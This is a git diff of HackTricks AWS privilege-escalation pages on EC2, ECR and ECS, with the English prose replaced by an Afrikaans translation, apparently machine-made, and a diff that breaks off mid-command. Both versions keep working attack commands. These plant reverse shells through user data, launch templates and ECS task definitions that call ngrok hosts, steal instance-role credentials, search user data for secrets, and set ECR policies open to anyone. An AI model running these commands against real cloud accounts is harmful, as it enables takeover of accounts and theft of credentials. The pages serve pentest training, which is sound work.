-**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+**Potensiële Impak:** Direkte privesc na 'n ander EC2-rol (jy moet 'n AWS EC2-instantie gekompromitteer het en 'n paar ekstra toestemmings of spesifieke instansieprofielstatus hê).
 
 ### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`)
 
-With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it.
-
-- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \*
+Met hierdie toestemmings is dit moontlik om die instansieprofiel wat aan 'n instansie gekoppel is, te verander, so as die aanval reeds toegang tot 'n instansie gehad het, sal hy in staat wees om akrediteer te steel vir meer instansieprofielrolle deur die een wat daarmee gekoppel is, te verander.
 
+- As dit **'n instansieprofiel het**, kan jy die instansieprofiel **verwyder** (`ec2:DisassociateIamInstanceProfile`) en dit **koppel** \*
 ```bash
 aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
 aws ec2 disassociate-iam-instance-profile --association-id <value>
 aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>
 ```
-
-- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \*
-
+- of **vervang** die **instansprofiel** van die gecompromitteerde instansie (`ec2:ReplaceIamInstanceProfileAssociation`). \*
 ````
 ```bash
-aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
+aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<waarde> --association-id <waarde>
 ```
 ````
-
-**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
+**Potensiële Impak:** Direkte privesc na 'n ander EC2-rol (jy moet 'n AWS EC2-instantie gekompromitteer het en 'n paar ekstra toestemmings of spesifieke instansieprofielstatus hê).
 
 ### `ec2:RequestSpotInstances`,`iam:PassRole`
 
-An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\
-Once the instance is run, he can **steal the IAM role**.
-
+'n Aanvaller met die toestemmings **`ec2:RequestSpotInstances`en`iam:PassRole`** kan **versoek** 'n **Spot Instantie** met 'n **EC2-rol aangeheg** en 'n **rev shell** in die **gebruikersdata**.\
+Sodra die instansie gedraai word, kan hy die **IAM-rol** **steel**.
 ```bash
 REV=$(printf '#!/bin/bash
 curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
 ' | base64)
 
 aws ec2 request-spot-instances \
-   --instance-count 1 \
-   --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
+--instance-count 1 \
+--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
 ```
-
 ### `ec2:ModifyInstanceAttribute`
 
-An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**.
-
-Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**.
+'n Aanvaller met die **`ec2:ModifyInstanceAttribute`** kan die instansies se eienskappe verander. Onder hulle kan hy **die gebruikersdata verander**, wat impliseer dat hy die instansie kan **arbitraire data laat loop.** Dit kan gebruik word om 'n **rev shell na die EC2 instansie** te kry.
 
+Let daarop dat die eienskappe slegs **gewysig kan word terwyl die instansie gestop is**, so die **toestemmings** **`ec2:StopInstances`** en **`ec2:StartInstances`**.
 ```bash
 TEXT='Content-Type: multipart/mixed; boundary="//"
 MIME-Version: 1.0
@@ -171,125 +154,110 @@ printf $TEXT | base64 > "$TEXT_PATH"
 aws ec2 stop-instances --instance-ids $INSTANCE_ID
 
 aws ec2 modify-instance-attribute \
-    --instance-id="$INSTANCE_ID" \
-    --attribute userData \
-    --value file://$TEXT_PATH
+--instance-id="$INSTANCE_ID" \
+--attribute userData \
+--value file://$TEXT_PATH
 
 aws ec2 start-instances --instance-ids $INSTANCE_ID
 ```
-
-**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance.
+**Potensiële Impak:** Direkte privesc na enige EC2 IAM Rol wat aan 'n geskepte instansie geheg is.
 
 ### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate`
 
-An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell.
-
+'n Aanvaller met die toestemmings **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`en `ec2:ModifyLaunchTemplate`** kan 'n **nuwe Launch Template weergawe** met 'n **rev shell in** die **gebruikersdata** en **enige EC2 IAM Rol daarop** skep, die standaard weergawe verander, en **enige Autoscaler groep** **wat** daardie **Launch Template** gebruik wat **gekonfigureer** is om die **nuutste** of die **standaard weergawe** te gebruik, sal die **instansies** weer **herbegin** met behulp van daardie template en die rev shell uitvoer.
 ```bash
 REV=$(printf '#!/bin/bash
 curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
 ' | base64)
 
 aws ec2 create-launch-template-version \
-   --launch-template-name bad_template \
-   --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"
+--launch-template-name bad_template \
+--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"
 
 aws ec2 modify-launch-template \
-   --launch-template-name bad_template \
-   --default-version 2
+--launch-template-name bad_template \
+--default-version 2
 ```
-
-**Potential Impact:** Direct privesc to a different EC2 role.
+**Potensiële Impak:** Direkte privesc na 'n ander EC2-rol.
 
 ### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole`
 
-An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**.
-
+'n Aanvaller met die toestemmings **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** kan **'n Launch Configuration** met 'n **IAM Rol** en 'n **rev shell** binne die **gebruikersdata** skep, dan **'n autoscaling-groep** uit daardie konfigurasie skep en wag vir die rev shell om **die IAM Rol** te **steel**.
 ```bash
 aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
-   --launch-configuration-name bad_config \
-   --image-id ami-0c1bc246476a5572b \
-   --instance-type t3.micro \
-   --iam-instance-profile EC2-CloudWatch-Agent-Role \
-   --user-data "$REV"
+--launch-configuration-name bad_config \
+--image-id ami-0c1bc246476a5572b \
+--instance-type t3.micro \
+--iam-instance-profile EC2-CloudWatch-Agent-Role \
+--user-data "$REV"
 
 aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
-   --auto-scaling-group-name bad_auto \
-   --min-size 1 --max-size 1 \
-   --launch-configuration-name bad_config \
-   --desired-capacity 1 \
-   --vpc-zone-identifier "subnet-e282f9b8"
+--auto-scaling-group-name bad_auto \
+--min-size 1 --max-size 1 \
+--launch-configuration-name bad_config \
+--desired-capacity 1 \
+--vpc-zone-identifier "subnet-e282f9b8"
 ```
-
-**Potential Impact:** Direct privesc to a different EC2 role.
+**Potensiële Impak:** Direkte privesc na 'n ander EC2-rol.
 
 ### `!autoscaling`
 
-The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc).
+Die stel van toestemmings **`ec2:CreateLaunchTemplate`** en **`autoscaling:CreateAutoScalingGroup`** **is nie genoeg om** bevoegdhede na 'n IAM-rol te verhoog nie, omdat jy om die rol wat in die Launch Configuration of in die Launch Template gespesifiseer is aan te heg **jy die toestemmings `iam:PassRole` en `ec2:RunInstances`** benodig (wat 'n bekende privesc is).
 
 ### `ec2-instance-connect:SendSSHPublicKey`
 
-An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges.
-
+'n Aanvaller met die toestemming **`ec2-instance-connect:SendSSHPublicKey`** kan 'n ssh-sleutel aan 'n gebruiker voeg en dit gebruik om toegang te verkry (as hy ssh-toegang tot die instansie het) of om bevoegdhede te verhoog.
 ```bash
 aws ec2-instance-connect send-ssh-public-key \
-   --instance-id "$INSTANCE_ID" \
-   --instance-os-user "ec2-user" \
-   --ssh-public-key "file://$PUBK_PATH"
+--instance-id "$INSTANCE_ID" \
+--instance-os-user "ec2-user" \
+--ssh-public-key "file://$PUBK_PATH"
 ```
-
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances.
+**Potensiële Impak:** Direkte privesc na die EC2 IAM rolle wat aan lopende instansies gekoppel is.
 
 ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey`
 
-An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**.
-
-In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
+'n Aanvaller met die toestemming **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** kan **'n ssh-sleutel by 'n seriële verbinding voeg**. As die seriële nie geaktiveer is nie, het die aanvaller die toestemming **`ec2:EnableSerialConsoleAccess` nodig om dit te aktiveer**.
 
+Om met die seriële poort te verbind, moet jy ook **die gebruikersnaam en wagwoord van 'n gebruiker** binne die masjien weet.
 ```bash
 aws ec2 enable-serial-console-access
 
 aws ec2-instance-connect send-serial-console-ssh-public-key \
-   --instance-id "$INSTANCE_ID" \
-   --serial-port 0 \
-   --region "eu-west-1" \
-   --ssh-public-key "file://$PUBK_PATH"
+--instance-id "$INSTANCE_ID" \
+--serial-port 0 \
+--region "eu-west-1" \
+--ssh-public-key "file://$PUBK_PATH"
 
 ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
 ```
+Hierdie manier is nie so nuttig vir privesc nie, aangesien jy 'n gebruikersnaam en wagwoord moet weet om dit te benut.
 
-This way isn't that useful to privesc as you need to know a username and password to exploit it.
-
-**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances.
+**Potensiële Impak:** (Hooglik onbewysbaar) Direkte privesc na die EC2 IAM rolle wat aan lopende instansies gekoppel is.
 
 ### `describe-launch-templates`,`describe-launch-template-versions`
 
-Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates:
-
+Aangesien lanseringsjablone weergawebeheer het, kan 'n aanvaller met **`ec2:describe-launch-templates`** en **`ec2:describe-launch-template-versions`** regte hierdie benut om sensitiewe inligting te ontdek, soos akrediteer wat in gebruikersdata teenwoordig is. Om dit te bereik, loop die volgende skrip deur alle weergawes van die beskikbare lanseringsjablone:
 ```bash
 for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
 do
-  echo "[*] Analyzing $i"
-  aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
-  do
-    echo "VersionNumber: $version"
-    echo "$userdata" | base64 -d
-    echo
-  done | grep -iE "aws_|password|token|api"
+echo "[*] Analyzing $i"
+aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
+do
+echo "VersionNumber: $version"
+echo "$userdata" | base64 -d
+echo
+done | grep -iE "aws_|password|token|api"
 done
 ```
+In die bogenoemde opdragte, alhoewel ons sekere patrone spesifiseer (`aws_|password|token|api`), kan jy 'n ander regex gebruik om ander tipes sensitiewe inligting te soek.
 
-In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information.
+As ons `aws_access_key_id` en `aws_secret_access_key` vind, kan ons hierdie akrediteerlinge gebruik om by AWS aan te meld.
 
-Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS.
+**Potensiële Impak:** Direkte voorregverhoging na IAM gebruiker(s).
 
-**Potential Impact:** Direct privilege escalation to IAM user(s).
-
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
index fd4686edb..a82053546 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
@@ -6,21 +6,21 @@
 
 ### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage`
 
-An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images.
+'n Aanvaller met die **`ecr:GetAuthorizationToken`** en **`ecr:BatchGetImage`** kan inlog op ECR en beelde aflaai.
 
-For more info on how to download images:
+Vir meer inligting oor hoe om beelde af te laai:
 
 {{#ref}}
 ../aws-post-exploitation/aws-ecr-post-exploitation.md
 {{#endref}}
 
-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die verkeer te onderskep.
 
 ### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
 
-An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used.
+'n Aanvaller met al daardie toestemmings **kan inlog op ECR en beelde oplaai**. Dit kan nuttig wees om voorregte na ander omgewings te eskaleer waar daardie beelde gebruik word.
 
-To learn how to upload a new image/update one, check:
+Om te leer hoe om 'n nuwe beeld op te laai/op te dateer, kyk:
 
 {{#ref}}
 ../aws-services/aws-eks-enum.md
@@ -28,85 +28,73 @@ To learn how to upload a new image/update one, check:
 
 ### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`
 
-Like the previous section, but for public repositories.
+Soos die vorige afdeling, maar vir openbare repositories.
 
 ### `ecr:SetRepositoryPolicy`
 
-An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\
-For example, in this example read access is given to everyone.
-
+'n Aanvaller met hierdie toestemming kan die **repository** **beleid** **verander** om homself (of selfs almal) **lees/skryf toegang** te gee.\
+Byvoorbeeld, in hierdie voorbeeld word lees toegang aan almal gegee.
 ```bash
 aws ecr set-repository-policy \
-    --repository-name <repo_name> \
-    --policy-text file://my-policy.json
+--repository-name <repo_name> \
+--policy-text file://my-policy.json
 ```
-
-Contents of `my-policy.json`:
-
+Inhoud van `my-policy.json`:
 ```json
 {
-  "Version": "2008-10-17",
-  "Statement": [
-    {
-      "Sid": "allow public pull",
-      "Effect": "Allow",
-      "Principal": "*",
-      "Action": [
-        "ecr:BatchCheckLayerAvailability",
-        "ecr:BatchGetImage",
-        "ecr:GetDownloadUrlForLayer"
-      ]
-    }
-  ]
+"Version": "2008-10-17",
+"Statement": [
+{
+"Sid": "allow public pull",
+"Effect": "Allow",
+"Principal": "*",
+"Action": [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
 }
 ```
-
 ### `ecr-public:SetRepositoryPolicy`
 
-Like the previoous section, but for public repositories.\
-An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
-
+Soos die vorige afdeling, maar vir openbare repositories.\
+'n Aanvaller kan **die repository-beleid** van 'n ECR Openbare repository wysig om ongeoorloofde openbare toegang te verleen of om hul voorregte te verhoog.
 ```bash
 bashCopy code# Create a JSON file with the malicious public repository policy
 echo '{
-  "Version": "2008-10-17",
-  "Statement": [
-    {
-      "Sid": "MaliciousPublicRepoPolicy",
-      "Effect": "Allow",
-      "Principal": "*",
-      "Action": [
-        "ecr-public:GetDownloadUrlForLayer",
-        "ecr-public:BatchGetImage",
-        "ecr-public:BatchCheckLayerAvailability",
-        "ecr-public:PutImage",
-        "ecr-public:InitiateLayerUpload",
-        "ecr-public:UploadLayerPart",
-        "ecr-public:CompleteLayerUpload",
-        "ecr-public:DeleteRepositoryPolicy"
-      ]
-    }
-  ]
+"Version": "2008-10-17",
+"Statement": [
+{
+"Sid": "MaliciousPublicRepoPolicy",
+"Effect": "Allow",
+"Principal": "*",
+"Action": [
+"ecr-public:GetDownloadUrlForLayer",
+"ecr-public:BatchGetImage",
+"ecr-public:BatchCheckLayerAvailability",
+"ecr-public:PutImage",
+"ecr-public:InitiateLayerUpload",
+"ecr-public:UploadLayerPart",
+"ecr-public:CompleteLayerUpload",
+"ecr-public:DeleteRepositoryPolicy"
+]
+}
+]
 }' > malicious_public_repo_policy.json
 
 # Apply the malicious public repository policy to the ECR Public repository
 aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
 ```
-
-**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
+**Potensiële Impak**: Onbevoegde openbare toegang tot die ECR Publieke berging, wat enige gebruiker in staat stel om beelde te stoot, te trek of te verwyder.
 
 ### `ecr:PutRegistryPolicy`
 
-An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.
-
+'n Aanvaller met hierdie toestemming kan die **registrasiebeleid** **verander** om homself, sy rekening (of selfs almal) **lees/skryf toegang** te verleen.
 ```bash
 aws ecr set-repository-policy \
-    --repository-name <repo_name> \
-    --policy-text file://my-policy.json
+--repository-name <repo_name> \
+--policy-text file://my-policy.json
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
index 4988270ab..c3a5291ef 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
@@ -4,7 +4,7 @@
 
 ## ECS
 
-More **info about ECS** in:
+Meer **inligting oor ECS** in:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
@@ -12,185 +12,173 @@ More **info about ECS** in:
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`
 
-An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.
-
+'n Aanvaller wat die `iam:PassRole`, `ecs:RegisterTaskDefinition` en `ecs:RunTask` toestemming in ECS misbruik, kan **nuwe taakdefinisie** genereer met 'n **kwaadwillige houer** wat die metadata-akkrediteerings steel en **dit uitvoer**.
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
-    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
-    --network-mode "awsvpc" \
-    --cpu 256 --memory 512\
-    --requires-compatibilities "[\"FARGATE\"]" \
-    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
+--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+--network-mode "awsvpc" \
+--cpu 256 --memory 512\
+--requires-compatibilities "[\"FARGATE\"]" \
+--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
 
 # Run task definition
 aws ecs run-task --task-definition iam_exfiltration \
-    --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
-    --launch-type FARGATE \
-    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
+--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
+--launch-type FARGATE \
+--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
 
 # Delete task definition
 ## You need to remove all the versions (:1 is enough if you just created one)
 aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 ```
-
-**Potential Impact:** Direct privesc to a different ECS role.
+**Potensiële Impak:** Direkte privesc na 'n ander ECS-rol.
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`
 
-Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\
+Net soos in die vorige voorbeeld kan 'n aanvaller wat die **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** toestemmings in ECS misbruik **nuwe taakdefinisie** genereer met 'n **kwaadaardige houer** wat die metadata-akkrediteerlinge steel en **dit uitvoer**.\
 However, in this case, a container instance to run the malicious task definition need to be.
-
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
-    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
-    --network-mode "awsvpc" \
-    --cpu 256 --memory 512\
-    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
+--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+--network-mode "awsvpc" \
+--cpu 256 --memory 512\
+--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
 
 aws ecs start-task --task-definition iam_exfiltration \
-    --container-instances <instance_id>
+--container-instances <instance_id>
 
 # Delete task definition
 ## You need to remove all the versions (:1 is enough if you just created one)
 aws ecs deregister-task-definition --task-definition iam_exfiltration:1
 ```
-
-**Potential Impact:** Direct privesc to any ECS role.
+**Potensiële Impak:** Direkte privesc na enige ECS-rol.
 
 ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
 
-Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**
-
+Net soos in die vorige voorbeeld kan 'n aanvaller wat die **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** of **`ecs:CreateService`** toestemmings in ECS misbruik, **'n nuwe taakdefinisie genereer** met 'n **kwaadwillige houer** wat die metadata-akkrediteerings steel en **dit uitvoer deur 'n nuwe diens te skep met ten minste 1 taak wat loop.**
 ```bash
 # Generate task definition with rev shell
 aws ecs register-task-definition --family iam_exfiltration \
-    --task-role-arn  "$ECS_ROLE_ARN" \
-    --network-mode "awsvpc" \
-    --cpu 256 --memory 512\
-    --requires-compatibilities "[\"FARGATE\"]" \
-    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
+--task-role-arn  "$ECS_ROLE_ARN" \
+--network-mode "awsvpc" \
+--cpu 256 --memory 512\
+--requires-compatibilities "[\"FARGATE\"]" \
+--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
 
 # Run the task creating a service
 aws ecs create-service --service-name exfiltration \
-    --task-definition iam_exfiltration \
-    --desired-count 1 \
-    --cluster "$CLUSTER_ARN" \
-    --launch-type FARGATE \
-    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
+--task-definition iam_exfiltration \
+--desired-count 1 \
+--cluster "$CLUSTER_ARN" \
+--launch-type FARGATE \
+--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
 
 # Run the task updating a service
 aws ecs update-service --cluster <CLUSTER NAME> \
-    --service <SERVICE NAME> \
-    --task-definition <NEW TASK DEFINITION NAME>
+--service <SERVICE NAME> \
+--task-definition <NEW TASK DEFINITION NAME>
 ```
-
-**Potential Impact:** Direct privesc to any ECS role.
+**Potensiële Impak:** Direkte privesc na enige ECS-rol.
 
 ### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`
 
-Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like:
-
+Werklik, net met daardie toestemmings is dit moontlik om oorskrywings te gebruik om arbitrêre opdragte in 'n houer met 'n arbitrêre rol uit te voer met iets soos:
 ```bash
 aws ecs run-task \
-    --task-definition "<task-name>" \
-    --overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
-    --cluster <cluster-name> \
-    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
+--task-definition "<task-name>" \
+--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
+--cluster <cluster-name> \
+--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
 ```
-
-**Potential Impact:** Direct privesc to any ECS role.
+**Potensiële Impak:** Direkte privesc na enige ECS rol.
 
 ### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
 
-This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\
-This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\
-You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)).
+Hierdie scenario is soos die vorige, maar **sonder** die **`iam:PassRole`** toestemming.\
+Dit is steeds interessant omdat as jy 'n arbitrêre houer kan uitvoer, selfs al is dit sonder 'n rol, jy 'n **privileged container kan uitvoer om te ontsnap** na die node en die **EC2 IAM rol** en die **ander ECS houer rolle** wat in die node loop, kan **steel**.\
+Jy kan selfs **ander take dwing om binne die EC2 instance** wat jy kompromitteer te loop om hul akrediteer te steel (soos bespreek in die [**Privesc na node afdeling**](aws-ecs-privesc.md#privesc-to-node)).
 
 > [!WARNING]
-> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate.
-
+> Hierdie aanval is slegs moontlik as die **ECS-kluster EC2** instances gebruik en nie Fargate nie.
 ```bash
 printf '[
-    {
-        "name":"exfil_creds",
-        "image":"python:latest",
-        "entryPoint":["sh", "-c"],
-        "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
-        "mountPoints": [
-            {
-                "readOnly": false,
